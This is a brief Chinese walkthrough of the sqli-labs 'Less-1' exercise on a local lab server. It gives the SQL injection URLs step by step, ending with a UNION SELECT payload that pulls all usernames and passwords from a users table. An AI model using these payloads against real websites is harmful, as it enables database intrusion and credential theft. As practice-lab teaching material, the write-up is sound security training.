less-1:

less-1:,第1张

less-1:

1、通过 http://127.0.0.1/sqli/Less-1/?id=1' 报错 说明存在注入

2、通过http://127.0.0.1/sqli/Less-1/?id=1' order by 10000 -- +判断闭合字符 为 ‘

3.使用http://127.0.0.1/sqli/Less-1/?id=1' order by 10000 -- + 二分法来判断列数

4.判断显示位

5.通过命令http://127.0.0.1/sqli/Less-1/?id=1' and 1=2 union  select 1,group_concat(username),group_concat(password) from users -- +查看字段内容

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/zaji/5713201.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-12-17
下一篇 2022-12-17

发表评论

登录后才能评论

评论列表(0条)

保存